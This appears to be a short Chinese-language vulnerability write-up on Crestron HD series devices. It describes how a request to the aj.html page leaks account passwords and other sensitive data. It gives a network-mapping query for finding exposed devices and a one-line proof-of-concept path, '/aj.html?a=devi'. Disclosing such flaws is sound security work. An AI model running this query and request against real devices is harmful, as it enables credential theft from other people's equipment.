漏洞描述
Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息。
漏洞影响
Crestron HD等系列设备
网络测绘
app=”Crestron-HD-RX-201-C-E”
漏洞复现
产品页面
验证POC
/aj.html?a=devi
© 版权声明
THE END
Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息。
Crestron HD等系列设备
app=”Crestron-HD-RX-201-C-E”
产品页面
验证POC
/aj.html?a=devi
暂无评论内容